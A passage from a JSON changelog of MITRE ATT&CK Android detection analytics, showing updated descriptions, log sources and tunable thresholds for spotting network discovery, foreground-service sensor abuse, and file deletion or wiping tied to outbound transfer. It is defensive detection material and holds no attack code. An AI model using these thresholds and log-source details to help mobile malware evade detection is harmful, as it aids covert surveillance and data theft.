                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_source_references']\": [{\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"android:appops\", \"channel\": \"ACCESS_FINE_LOCATION|NEARBY_DEVICES|BLUETOOTH_SCAN used in close proximity to network-context queries\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"wifiservice startScan / scanResults retrieved repeatedly or by unexpected package\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"bluetoothmanager startDiscovery / getBondedDevices / scan callback bursts by package\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"telephony cell info enumeration bursts (neighboring/all cell info) by package\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Flow\", \"channel\": \"burst of DNS queries/connection attempts to RFC1918 or local gateway immediately after scans\"}], \"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Correlation window to link scan/enumeration API usage with subsequent probes (e.g., 30\\u2013300s).\"}, {\"field\": \"MinScanCalls\", \"description\": \"Minimum number of scan/enumeration calls per window before flagging (e.g., \\u22653 Wi-Fi scans / 5 min).\"}, {\"field\": \"MinUniqueTargets\", \"description\": \"For Bluetooth/cell, minimum unique devices/towers observed per window (helps avoid single-device noise).\"}, {\"field\": \"BackgroundOnly\", \"description\": \"Require app to be backgrounded during discovery to suppress legitimate UI-driven network selection.\"}, {\"field\": \"AllowlistedPackages\", \"description\": \"Packages expected to scan (system settings, Wi-Fi managers, MDM, enterprise connectivity tools).\"}, {\"field\": \"LocationPermissionRequired\", \"description\": \"If true, require AppOps noteOp for fine location/nearby devices to reduce false positives.\"}, {\"field\": \"LocalProbeCIDRs\", \"description\": \"CIDR ranges considered 'local discovery' targets (e.g., 192.168.0.0/16, 10.0.0.0/8).\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-02-18 19:46:01.796000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender observes an app (package/UID) repeatedly querying device networking context APIs (Wi-Fi scan results/current SSID/BSSID, Bluetooth device discovery, or cellular tower lists) at a rate or timing inconsistent with the app\\u2019s normal UX, often while backgrounded. Correlate API calls with permission usage (fine location, nearby devices/Bluetooth) and concurrent connectivity probes (DNS lookups/ARP/port reachability) to distinguish automated discovery from user-initiated settings checks. The detection is based on observed API execution + permission use + rate/sequence, not the specific API method name.\", \"old_value\": \"System Network Connections Discovery can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to91__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to91__0\"><a href=\"#difflib_chg_to91__top\">t</a></td><td class=\"diff_header\" id=\"from91_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">System&nbsp;Network&nbsp;Connections&nbsp;Discovery&nbsp;can&nbsp;be&nbsp;difficult&nbsp;to&nbsp;det</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to91__top\">t</a></td><td class=\"diff_header\" id=\"to91_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;observes&nbsp;an&nbsp;app&nbsp;(package/UID)&nbsp;repeatedly&nbsp;querying&nbsp;d</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ect,&nbsp;and&nbsp;therefore&nbsp;enterprises&nbsp;may&nbsp;be&nbsp;better&nbsp;served&nbsp;focusing</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">evice&nbsp;networking&nbsp;context&nbsp;APIs&nbsp;(Wi-Fi&nbsp;scan&nbsp;results/current&nbsp;SS</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;on&nbsp;detection&nbsp;at&nbsp;other&nbsp;stages&nbsp;of&nbsp;adversarial&nbsp;behavior.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ID/BSSID,&nbsp;Bluetooth&nbsp;device&nbsp;discovery,&nbsp;or&nbsp;cellular&nbsp;tower&nbsp;list</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">s)&nbsp;at&nbsp;a&nbsp;rate&nbsp;or&nbsp;timing&nbsp;inconsistent&nbsp;with&nbsp;the&nbsp;app\u2019s&nbsp;normal&nbsp;UX</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">,&nbsp;often&nbsp;while&nbsp;backgrounded.&nbsp;Correlate&nbsp;API&nbsp;calls&nbsp;with&nbsp;permiss</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ion&nbsp;usage&nbsp;(fine&nbsp;location,&nbsp;nearby&nbsp;devices/Bluetooth)&nbsp;and&nbsp;conc</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">urrent&nbsp;connectivity&nbsp;probes&nbsp;(DNS&nbsp;lookups/ARP/port&nbsp;reachabilit</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">y)&nbsp;to&nbsp;distinguish&nbsp;automated&nbsp;discovery&nbsp;from&nbsp;user-initiated&nbsp;se</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ttings&nbsp;checks.&nbsp;The&nbsp;detection&nbsp;is&nbsp;based&nbsp;on&nbsp;observed&nbsp;API&nbsp;execut</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ion&nbsp;+&nbsp;permission&nbsp;use&nbsp;+&nbsp;rate/sequence,&nbsp;not&nbsp;the&nbsp;specific&nbsp;API&nbsp;m</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ethod&nbsp;name.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--2df1959e-8ec4-4193-9cb8-c089c78b4d1c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-08 20:14:18.733000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0637#AN1711",
                            "external_id": "AN1711"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1711",
                    "description": "The defender correlates foreground service start or promotion activity with persistent-notification presentation, long-lived application execution, and continued access to while-in-use sensors or network activity outside expected user-driven context. The analytic looks for an application invoking foreground service APIs, sustaining a foreground state longer than expected for its declared role, and retaining camera, microphone, location, or other sensor access while the device is locked, the app lacks recent interaction, or the notification identity/function does not match the application\u2019s behavior.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application calls startForegroundService() or startForeground() / ServiceCompat.startForeground() and transitions to persistent foreground-service execution at the start of the chain"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Persistent foreground-service notification is created, updated, or remains visible while app behavior or notification identity is inconsistent with declared function during the persistence interval"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
                            "name": "MobileEDR:telemetry",
                            "channel": "Foreground service continues accessing camera, microphone, location, or other while-in-use sensors after service promotion and outside recent user interaction"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "AllowedAppList",
                            "description": "Apps legitimately expected to run foreground services such as navigation, fitness, calling, media playback, enterprise VPN, accessibility, or device-management apps"
                        },
                        {
                            "field": "AllowedServiceTypes",
                            "description": "Approved foreground service types and role-to-type mappings, especially for Android 14+ and later"
                        },
                        {
                            "field": "ForegroundDurationThreshold",
                            "description": "Duration a foreground service may legitimately remain active before suspicion increases"
                        },
                        {
                            "field": "SensorAfterPromotionWindow",
                            "description": "Maximum expected delay between service promotion and sensor activation for legitimate workflows"
                        },
                        {
                            "field": "NotificationMismatchPatterns",
                            "description": "Patterns indicating misleading or impersonating foreground notifications, such as benign-looking text or mismatched app function"
                        },
                        {
                            "field": "RecentInteractionThreshold",
                            "description": "How recently the user must have interacted with the app for sensor or network activity to be considered expected"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Minimum sustained outbound volume or beacon frequency during persistent foreground execution"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"AllowedAppList\", \"description\": \"Apps legitimately expected to run foreground services such as navigation, fitness, calling, media playback, enterprise VPN, accessibility, or device-management apps\"}, {\"field\": \"AllowedServiceTypes\", \"description\": \"Approved foreground service types and role-to-type mappings, especially for Android 14+ and later\"}, {\"field\": \"ForegroundDurationThreshold\", \"description\": \"Duration a foreground service may legitimately remain active before suspicion increases\"}, {\"field\": \"SensorAfterPromotionWindow\", \"description\": \"Maximum expected delay between service promotion and sensor activation for legitimate workflows\"}, {\"field\": \"NotificationMismatchPatterns\", \"description\": \"Patterns indicating misleading or impersonating foreground notifications, such as benign-looking text or mismatched app function\"}, {\"field\": \"RecentInteractionThreshold\", \"description\": \"How recently the user must have interacted with the app for sensor or network activity to be considered expected\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Minimum sustained outbound volume or beacon frequency during persistent foreground execution\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-08 20:14:18.733000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates foreground service start or promotion activity with persistent-notification presentation, long-lived application execution, and continued access to while-in-use sensors or network activity outside expected user-driven context. The analytic looks for an application invoking foreground service APIs, sustaining a foreground state longer than expected for its declared role, and retaining camera, microphone, location, or other sensor access while the device is locked, the app lacks recent interaction, or the notification identity/function does not match the application\\u2019s behavior.\", \"old_value\": \"The user can see persistent notifications in their notification drawer and can subsequently uninstall applications that do not belong.\\nApplications could be vetted for their use of the `startForeground()` API, and could be further scrutinized if usage is found.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-The user can see persistent notifications in their notification drawer and can subsequently uninstall applications that do not belong.\\n-Applications could be vetted for their use of the `startForeground()` API, and could be further scrutinized if usage is found.\\n+The defender correlates foreground service start or promotion activity with persistent-notification presentation, long-lived application execution, and continued access to while-in-use sensors or network activity outside expected user-driven context. The analytic looks for an application invoking foreground service APIs, sustaining a foreground state longer than expected for its declared role, and retaining camera, microphone, location, or other sensor access while the device is locked, the app lacks recent interaction, or the notification identity/function does not match the application\\u2019s behavior.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application calls startForegroundService() or startForeground() / ServiceCompat.startForeground() and transitions to persistent foreground-service execution at the start of the chain\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4\", \"name\": \"User Interface\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Persistent foreground-service notification is created, updated, or remains visible while app behavior or notification identity is inconsistent with declared function during the persistence interval\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Foreground service continues accessing camera, microphone, location, or other while-in-use sensors after service promotion and outside recent user interaction\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to77__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to77__0\"><a href=\"#difflib_chg_to77__top\">t</a></td><td class=\"diff_header\" id=\"from77_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">The&nbsp;user&nbsp;can&nbsp;see&nbsp;persistent&nbsp;notifications&nbsp;in&nbsp;their&nbsp;notificat</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to77__top\">t</a></td><td class=\"diff_header\" id=\"to77_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;foreground&nbsp;service&nbsp;start&nbsp;or&nbsp;promotio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ion&nbsp;drawer&nbsp;and&nbsp;can&nbsp;subsequently&nbsp;uninstall&nbsp;applications&nbsp;that&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n&nbsp;activity&nbsp;with&nbsp;persistent-notification&nbsp;presentation,&nbsp;long-l</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">do&nbsp;not&nbsp;belong.&nbsp;Applications&nbsp;could&nbsp;be&nbsp;vetted&nbsp;for&nbsp;their&nbsp;use&nbsp;of</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ived&nbsp;application&nbsp;execution,&nbsp;and&nbsp;continued&nbsp;access&nbsp;to&nbsp;while-in</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;the&nbsp;`startForeground()`&nbsp;API,&nbsp;and&nbsp;could&nbsp;be&nbsp;further&nbsp;scrutiniz</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">-use&nbsp;sensors&nbsp;or&nbsp;network&nbsp;activity&nbsp;outside&nbsp;expected&nbsp;user-drive</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ed&nbsp;if&nbsp;usage&nbsp;is&nbsp;found.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n&nbsp;context.&nbsp;The&nbsp;analytic&nbsp;looks&nbsp;for&nbsp;an&nbsp;application&nbsp;invoking&nbsp;fo</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">reground&nbsp;service&nbsp;APIs,&nbsp;sustaining&nbsp;a&nbsp;foreground&nbsp;state&nbsp;longer&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">than&nbsp;expected&nbsp;for&nbsp;its&nbsp;declared&nbsp;role,&nbsp;and&nbsp;retaining&nbsp;camera,&nbsp;m</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">icrophone,&nbsp;location,&nbsp;or&nbsp;other&nbsp;sensor&nbsp;access&nbsp;while&nbsp;the&nbsp;device</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;is&nbsp;locked,&nbsp;the&nbsp;app&nbsp;lacks&nbsp;recent&nbsp;interaction,&nbsp;or&nbsp;the&nbsp;notific</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ation&nbsp;identity/function&nbsp;does&nbsp;not&nbsp;match&nbsp;the&nbsp;application\u2019s&nbsp;beh</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">avior.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--f6be418e-3fed-4026-b665-f055465c7359",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-24 20:30:39.616000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0638#AN1712",
                            "external_id": "AN1712"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1712",
                    "description": "Correlates (1) application access to or staging of local files likely to be of operational, evidentiary, or user value, (2) deletion of those files or wipe-like destructive actions through ordinary storage access, administrative controls, or privileged/rooted paths, and (3) continued app or device activity after deletion, including cleanup, concealment, or outbound transfer. The defender observes a causal chain where files are first accessed or prepared, then removed, and device-side behavior continues after evidence or data is gone.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "application holds device administrator, device owner, or other managed authority capable of wipe or destructive device-level action before bulk file loss or wipe event"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "device posture indicates rooted, compromised, or non-compliant state before protected or atypical filesystem deletion activity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8",
                            "name": "MobileEDR:telemetry",
                            "channel": "application deletes, truncates, or removes user, operational, or evidence-bearing files after prior access or staging and before later continued execution or communication"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes file-management, package, storage, or administrative wipe operations immediately before loss of expected local files or file collections"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between file access or staging, deletion event, and subsequent activity"
                        },
                        {
                            "field": "FileScopeSet",
                            "description": "File paths, storage scopes, and data classes monitored for suspicious deletion, such as documents, databases, media, email stores, or update artifacts"
                        },
                        {
                            "field": "DeletionVolumeThreshold",
                            "description": "Threshold for number, size, or concentration of deleted files required before escalation"
                        },
                        {
                            "field": "AllowedCleanupApps",
                            "description": "Legitimate applications expected to rotate, purge, or clean up files in the environment"
                        },
                        {
                            "field": "ProtectedRoleSet",
                            "description": "Administrative or rooted control paths that materially increase destructive file deletion capability"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Outbound traffic threshold used to distinguish exfiltration-linked cleanup from benign maintenance activity"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between file access or staging, deletion event, and subsequent activity\"}, {\"field\": \"FileScopeSet\", \"description\": \"File paths, storage scopes, and data classes monitored for suspicious deletion, such as documents, databases, media, email stores, or update artifacts\"}, {\"field\": \"DeletionVolumeThreshold\", \"description\": \"Threshold for number, size, or concentration of deleted files required before escalation\"}, {\"field\": \"AllowedCleanupApps\", \"description\": \"Legitimate applications expected to rotate, purge, or clean up files in the environment\"}, {\"field\": \"ProtectedRoleSet\", \"description\": \"Administrative or rooted control paths that materially increase destructive file deletion capability\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Outbound traffic threshold used to distinguish exfiltration-linked cleanup from benign maintenance activity\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 20:30:39.616000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates (1) application access to or staging of local files likely to be of operational, evidentiary, or user value, (2) deletion of those files or wipe-like destructive actions through ordinary storage access, administrative controls, or privileged/rooted paths, and (3) continued app or device activity after deletion, including cleanup, concealment, or outbound transfer. The defender observes a causal chain where files are first accessed or prepared, then removed, and device-side behavior continues after evidence or data is gone.\", \"old_value\": \"Mobile security products can detect which applications can request device administrator permissions. Application vetting services could be extra scrutinous of applications that request device administrator permissions.\\nThe user can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Mobile security products can detect which applications can request device administrator permissions. Application vetting services could be extra scrutinous of applications that request device administrator permissions.\\n-The user can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing. \\n+Correlates (1) application access to or staging of local files likely to be of operational, evidentiary, or user value, (2) deletion of those files or wipe-like destructive actions through ordinary storage access, administrative controls, or privileged/rooted paths, and (3) continued app or device activity after deletion, including cleanup, concealment, or outbound transfer. The defender observes a causal chain where files are first accessed or prepared, then removed, and device-side behavior continues after evidence or data is gone.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"application holds device administrator, device owner, or other managed authority capable of wipe or destructive device-level action before bulk file loss or wipe event\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"device posture indicates rooted, compromised, or non-compliant state before protected or atypical filesystem deletion activity\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application deletes, truncates, or removes user, operational, or evidence-bearing files after prior access or staging and before later continued execution or communication\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes file-management, package, storage, or administrative wipe operations immediately before loss of expected local files or file collections\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to84__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to84__0\"><a href=\"#difflib_chg_to84__top\">t</a></td><td class=\"diff_header\" id=\"from84_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Mobile&nbsp;security&nbsp;products&nbsp;can&nbsp;detect&nbsp;which&nbsp;applications&nbsp;can&nbsp;r</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to84__top\">t</a></td><td class=\"diff_header\" id=\"to84_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;(1)&nbsp;application&nbsp;access&nbsp;to&nbsp;or&nbsp;staging&nbsp;of&nbsp;local&nbsp;fil</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">equest&nbsp;device&nbsp;administrator&nbsp;permissions.&nbsp;Application&nbsp;vetting</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">es&nbsp;likely&nbsp;to&nbsp;be&nbsp;of&nbsp;operational,&nbsp;evidentiary,&nbsp;or&nbsp;user&nbsp;value,&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;services&nbsp;could&nbsp;be&nbsp;extra&nbsp;scrutinous&nbsp;of&nbsp;applications&nbsp;that&nbsp;req</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span 